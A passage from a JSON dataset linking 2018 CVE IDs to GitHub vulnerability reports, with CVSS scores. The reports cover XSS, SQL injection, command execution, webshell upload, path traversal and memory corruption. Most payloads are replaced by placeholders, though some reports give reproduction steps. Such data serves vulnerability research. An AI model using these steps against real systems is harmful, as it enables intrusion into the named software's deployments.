        "description": "Denial of Service vulnerability caused by improper exception handling while parsing of APITAG messages . Multiple sample applications from APITAG library are vulnerable to Denial of Service attacks caused by maliciously crafted APITAG messages. Method APITAG improperly handle multiple exception types leading to crash of applications (including standard APITAG server, APITAG client, example collect APITAG server and client). Example payloads and unhandled exceptions NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in deserialize APITAG = APITAG NUMBERTAG File PATHTAG line NUMBERTAG in decode return APITAG errors, True) ERRORTAG 'utf8' codec can't decode byte NUMBERTAG fd in position NUMBERTAG invalid start byte NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in deserialize APITAG = APITAG NUMBERTAG File PATHTAG line NUMBERTAG in token value = str(value) ERRORTAG 'ascii' codec can't encode character u'\\u NUMBERTAG in position NUMBERTAG ordinal not in range NUMBERTAG Proposed CVSS score: PATHTAG NUMBERTAG High) Mitigation: All exception types should be handled in the main loop of APITAG applications (including standard APITAG server, APITAG client, example collect APITAG server and client), to provide uninterruptible service. FILETAG Issue was reported via email on NUMBERTAG th of February to APITAG developers and registered in CVE database (reserved id is: CVETAG ).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12684",
        "Issue_Url_old": "https://github.com/civetweb/civetweb/issues/633",
        "Issue_Url_new": "https://github.com/civetweb/civetweb/issues/633",
        "Repo_new": "civetweb/civetweb",
        "Issue_Created_At": "2018-06-15T06:30:26Z",
        "description": "Need an email address to report NUMBERTAG ulnerabilities we've found. Hello, during security auditing of other product that use your library, we have found NUMBERTAG ulnerabilities in civetweb and want to report them to you NUMBERTAG of them is considered to be fatal NUMBERTAG remote memory reveal NUMBERTAG remote code execution) so we want to report by email. We've found this line in PATHTAG \" In case you think you found a security issue that should be evaluated and fixed before public disclosure, feel free to write an email. \u201c But I couldn't find any email address in the docs, would you please offer your email address so we can send the detailed report to you? Thank you. Tencent Blade Team",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12687",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/84",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/84",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2018-06-22T13:46:12Z",
        "description": "Assert failure. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a assert failure problem is triggered in APITAG test_tinyexr: APITAG bool APITAG char , const int , const unsigned char , size_t, int, int, int, int, int, int, int, int, size_t, size_t, const APITAG , size_t, const APITAG , const std::vector<long unsigned int>&): Assertion `ret' failed. Aborted",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12688",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/83",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/83",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2018-06-22T13:45:49Z",
        "description": "Segmentation Fault. I build tinyexr with gcc. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a segmentation fault is triggered. GDB provides information as follow NUMBERTAG f NUMBERTAG in APITAG short , int, int, int, int, unsigned short NUMBERTAG e in APITAG char , unsigned char const , unsigned long, unsigned long, int, APITAG const , int, int NUMBERTAG ad in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const NUMBERTAG b in APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long NUMBERTAG cee in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const NUMBERTAG a NUMBERTAG in APITAG NUMBERTAG a in APITAG NUMBERTAG d0 in APITAG NUMBERTAG f2e1 in main ()",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12695",
        "Issue_Url_old": "https://github.com/nsmaomao/mao10cms/issues/2",
        "Issue_Url_new": "https://github.com/nsmaomao/mao10cms/issues/2",
        "Repo_new": "nsmaomao/mao10cms",
        "Issue_Created_At": "2018-06-25T15:47:25Z",
        "description": "Stored XSS at the bbs page. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12696",
        "Issue_Url_old": "https://github.com/nsmaomao/mao10cms/issues/3",
        "Issue_Url_new": "https://github.com/nsmaomao/mao10cms/issues/3",
        "Repo_new": "nsmaomao/mao10cms",
        "Issue_Created_At": "2018-06-25T15:57:15Z",
        "description": "Stored XSS at the article. The xss was found at the article page. Ishould set up a topic to write article. FILETAG I post a topic called xss to prove this xss. FILETAG First I input \" APITAG \" at the title and article just like this. FILETAG FILETAG When I submit it, we can see it showing normal FILETAG But if I edit this article again,and input \" APITAG \" at the title it will alert 'xss'.It is stored xss too. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12884",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4674",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4674",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-06-26T00:55:25Z",
        "description": "Users with incorrect permissions may be able to create Accounts. Under some circumstances, users without the correct permissions, may be able to create new Accounts (under the Infrastructure menu).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12889",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/279",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/279",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2018-06-26T11:50:27Z",
        "description": "Heap Buffer Overrun in APITAG when reading CCNx or NDN binary file. Description Heap Buffer Overrun in APITAG issued by a non null terminated array when reading an binary CCNx or NDN file. This Heap Buffer Overrun can result in a Heap Corruption when parsing a binary CCNx or NDN file. Steps to reproduce the issue The Heap Corruption can be triggered by a binary NDN file with a longer data than indicated by a the corresponding TLV.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12905",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/427",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/427",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-06-27T09:19:06Z",
        "description": "i found another xss vul about FILETAG (\u64ad\u653e\u5668\u7ba1\u7406). APITAG FILETAG click \u2018\u7cfb\u7edf\u7ba1\u7406\u2019 (system manage) then click '\u6dfb\u52a0' (add) FILETAG click '\u4fdd\u5b58' (save) then refresh the page FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12909",
        "Issue_Url_old": "https://github.com/jokkedk/webgrind/issues/112",
        "Issue_Url_new": "https://github.com/jokkedk/webgrind/issues/112",
        "Repo_new": "jokkedk/webgrind",
        "Issue_Created_At": "2018-06-27T00:04:15Z",
        "description": "Local File Disclosure using fileviewer functionality. Line NUMBERTAG in FILETAG lets anyone view all the local files the web server has access to. APITAG Example exploit APITAG Can we avoid relying on user input to get 'file'?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12912",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/4",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/4",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2018-06-26T04:43:47Z",
        "description": "APITAG NUMBERTAG SQL Injection. Vulnerability file: PATHTAG > private function APITAG > { > $this >db >exe(\"DELETE FROM APITAG \"); > $msg = '\u5df2\u5b8c\u6210\u6e05\u7a7a\u6570\u636e\u5e93\u8868: ' . $tablename . ' APITAG '; > > return $msg; > } The $tablename parameter controllable. POC APITAG Privilege): > PATHTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-12914",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/13",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/13",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2018-06-27T10:03:08Z",
        "description": "There is a APITAG Unzip\" vulnerability that can get webshell. ver NUMBERTAG using a specially crafted zip archive, that holds path traversal APITAG you used unzip method you will get a shell a zip looks like this: FILETAG the path you will get from there: FILETAG (so,your website true path is PATHTAG ) upload and unzip FILETAG FILETAG APITAG will write into your server FILETAG Execute the command FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12915",
        "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/118",
        "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/118",
        "Repo_new": "cloudwu/pbc",
        "Issue_Created_At": "2018-06-27T07:32:26Z",
        "description": "global buffer overflow in calc_hash APITAG Hello.I use my company tool.I found two APITAG is first APITAG I want to provide more information.I hope will hope your guys.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12916",
        "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/120",
        "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/120",
        "Repo_new": "cloudwu/pbc",
        "Issue_Created_At": "2018-06-27T07:47:36Z",
        "description": "Segmentation fault in APITAG (). Hello.I use my company tool.I found two Segmentation APITAG is first APITAG I want to provide more information.I hope will hope your guys.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12917",
        "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/119",
        "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/119",
        "Repo_new": "cloudwu/pbc",
        "Issue_Created_At": "2018-06-27T07:37:01Z",
        "description": "heap buffer overflow in APITAG APITAG Hello.I use my company tool.I found two APITAG is Second APITAG I want to provide more information.I hope will hope your guys.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12918",
        "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/121",
        "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/121",
        "Repo_new": "cloudwu/pbc",
        "Issue_Created_At": "2018-06-27T07:51:36Z",
        "description": "Segmentation fault in . Hello.I use my company tool.I found two Segmentation APITAG is Second APITAG I want to provide more information.I hope will hope your guys.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12972",
        "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1239",
        "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1239",
        "Repo_new": "opentsdb/opentsdb",
        "Issue_Created_At": "2018-06-29T02:55:11Z",
        "description": "vulnerability! remote command execute in 'q' request method. many parameters which in \u2018q\u2019 request method can execute command, including o, key, style, yrange and its json input, y2range and its json input. url: opentsdb APITAG ps: opentsdb a.b.com is a host which use opentsdb service. poc: take 'o' parameter as example, requeset url: opentsdb APITAG c NUMBERTAG APITAG response: show ping infomations.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12973",
        "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1240",
        "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1240",
        "Repo_new": "opentsdb/opentsdb",
        "Issue_Created_At": "2018-06-29T03:03:34Z",
        "description": "vulnerability! XSS in \u2018q\u2019 request method. there is XSS in parameter 'json' of \u2018q\u2019 request method. url and payload: opentsdb APITAG APITAG <\" ps: opentsdb a.b.com is a host which use opentsdb service.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12988",
        "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/111",
        "Issue_Url_new": "https://github.com/greencms/greencms/issues/111",
        "Repo_new": "greencms/greencms",
        "Issue_Created_At": "2018-06-27T01:32:12Z",
        "description": "APITAG NUMBERTAG payload GET /greencms APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG APITAG APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG id\u53c2\u6570\u503c\u4e3abase NUMBERTAG APITAG \u89e3\u7801\u4e3a\uff1a PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12993",
        "Issue_Url_old": "https://github.com/rocktronica/OneFileCMS/issues/6",
        "Issue_Url_new": "https://github.com/rocktronica/onefilecms/issues/6",
        "Repo_new": "rocktronica/onefilecms",
        "Issue_Created_At": "2018-06-28T15:39:39Z",
        "description": "the username and password can be bruted. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12994",
        "Issue_Url_old": "https://github.com/rocktronica/OneFileCMS/issues/7",
        "Issue_Url_new": "https://github.com/rocktronica/onefilecms/issues/7",
        "Repo_new": "rocktronica/onefilecms",
        "Issue_Created_At": "2018-06-28T16:12:08Z",
        "description": "The \" New APITAG \" button cause getshell. FILETAG use username and password login the page type New filename ' FILETAG ' click Create FILETAG FILETAG created successfully. FILETAG click FILETAG write below APITAG click save FILETAG NUMBERTAG php saved successfully. PATHTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12996",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/7",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/7",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-28T15:46:12Z",
        "description": "Zoho manageengine Applications Manager Reflected XSS. ================= Zoho manageengine Applications Manager Reflected XSS ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Proof of Concept: ================= APITAG notice: It can be successfully reproduced under IE.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12997",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/8",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/8",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-28T15:56:42Z",
        "description": "Zoho manageengine Arbitrary File Read in multiple Products. ================= Zoho manageengine Arbitrary File Read in multiple Products ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Affected Products: Netflow Analyzer Network Configuration Manager APITAG Oputils Opmanagerplus firewall analyzer Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi: ================= APITAG ================= Proof of Concept: ================= CODETAG FILETAG Notice: This vul can reproduce without login.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12998",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/10",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/10",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-28T16:10:44Z",
        "description": "Zoho manageengine Arbitrary Reflected XSS in multiple Products . ================= Zoho manageengine XSS in multiple Products ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Affected Products: Netflow Analyzer Network Configuration Manager APITAG Oputils Opmanagerplus firewall analyzer Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi: ================= APITAG ================= Proof of Concept: ================= APITAG FILETAG Notice: This vul can reproduce without login.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12999",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/9",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/9",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-28T16:04:32Z",
        "description": "Zoho manageengine Desktop Central Arbitrary File Deletion. ================= Zoho manageengine Desktop Central Arbitrary File Deletion ================= Date: PATHTAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi ================= APITAG ================= Proof of Concept: ================= CODETAG notice: It can be successfully reproduced without login info.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13005",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1088",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1088",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-06-28T08:55:42Z",
        "description": "in box_code_base.c line NUMBERTAG has a heap overflow.. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [ x ] I looked for a similar issue and couldn't find any. [ x ] I tried with the latest version of GPAC. Installers available at github commit NUMBERTAG I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in box_code_base.c [line NUMBERTAG URLTAG has a heap overflow. CODETAG When you end the while loop, you access tmpname[to_read NUMBERTAG causing a heap overflow. You should change it like this APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13007",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/29",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/29",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2018-06-29T03:40:40Z",
        "description": "three heap overflow in GPMF_parser.c in function APITAG three heap overflow in GPMF_parser.c line NUMBERTAG line NUMBERTAG line NUMBERTAG in function APITAG fix it like this APITAG asan report ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13010",
        "Issue_Url_old": "https://github.com/wstmall/wstmall/issues/4",
        "Issue_Url_new": "https://github.com/wstmall/wstmall/issues/4",
        "Repo_new": "wstmall/wstmall",
        "Issue_Created_At": "2018-06-28T14:07:25Z",
        "description": "CSRF that can add or delete user account. This vulnerability was found at the admin page. FILETAG As we can see NUMBERTAG users' integral are NUMBERTAG It was created by CSRF. CODETAG If we post this form and admin click it, it will add an account. Attacker can use this to earn integral maliciously FILETAG Attacker also can delete any account include store account by CSRF There are NUMBERTAG store accounts to test FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13011",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/31",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/31",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2018-06-29T06:45:10Z",
        "description": "a heap buffer overflow in GPMF_parser.c line NUMBERTAG in functions APITAG a heap buffer overflow in GPMF_parser.c line NUMBERTAG in functions APITAG asan report ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13021",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/5",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/5",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2018-06-29T06:43:03Z",
        "description": "Arbitrary File Upload Getshell . Steps To Reproduce NUMBERTAG Login to the backstage as the admin NUMBERTAG POST ERRORTAG NUMBERTAG shell is FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-13026",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/32",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/32",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2018-06-30T03:34:43Z",
        "description": "a heap buffer overflow in APITAG function APITAG a heap buffer overflow in APITAG function APITAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13030",
        "Issue_Url_old": "https://github.com/kornelski/jpeg-compressor/issues/12",
        "Issue_Url_new": "https://github.com/kornelski/jpeg-compressor/issues/12",
        "Repo_new": "kornelski/jpeg-compressor",
        "Issue_Created_At": "2018-06-30T08:57:29Z",
        "description": "A crash with specific image:stack buffer overflow. I use Clang NUMBERTAG and APITAG to build jpeg compressor NUMBERTAG this file URLTAG can cause stack buffer overflow when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-13031",
        "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/6",
        "Issue_Url_new": "https://github.com/autismjh/damicms/issues/6",
        "Repo_new": "autismjh/damicms",
        "Issue_Created_At": "2019-12-02T15:35:30Z",
        "description": "Bug NUMBERTAG Cross site request APITAG admin). There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG APITAG page has changed FILETAG NUMBERTAG check source code There are some codes check token, but as if not take function FILETAG We find the default PATHTAG 'TOKEN_ON' => false, Means not user token, so have the Cross site request forgery vulnerability FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13037",
        "Issue_Url_old": "https://github.com/kornelski/jpeg-compressor/issues/13",
        "Issue_Url_new": "https://github.com/kornelski/jpeg-compressor/issues/13",
        "Repo_new": "kornelski/jpeg-compressor",
        "Issue_Created_At": "2018-07-01T04:08:57Z",
        "description": "A crash with specific image:heap buffer overflow in function bmp_load. I use Clang NUMBERTAG and APITAG to build jpeg compressor NUMBERTAG this file URLTAG can cause heap_buffer_overflow when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-13038",
        "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1177",
        "Issue_Url_new": "https://github.com/opensid/opensid/issues/1177",
        "Repo_new": "opensid/opensid",
        "Issue_Created_At": "2018-07-01T09:10:19Z",
        "description": "FILETAG FILETAG NUMBERTAG Selanjutnya simpan, dan pergi ke halaman ubah artikel yang tadi kita buat. FILETAG NUMBERTAG Ketika link download diklik, maka akan diarahkan keahalaman backdoor PHP yang berhasil terupload. Melalui backdoor ini dapat digunakan untuk mengeksekusi perintah sistem seperti whoami. Sekenario terburuknya adalah server dapat diambil alih. FILETAG Seperti apa yang diharapkan? Pengembang perlu memfilter fitur upload lampiran. Tidak hanya memfilter extension saja namun perlu memfilter mime type. Jangan perbolehkan PHP dapat diupload ke server, karena risikonya begitu besar. Apa yang terjadi? Risiko terburuknya server dapat diambil alih melalui bug ini. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13039",
        "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1175",
        "Issue_Url_new": "https://github.com/opensid/opensid/issues/1175",
        "Repo_new": "opensid/opensid",
        "Issue_Created_At": "2018-07-01T08:11:38Z",
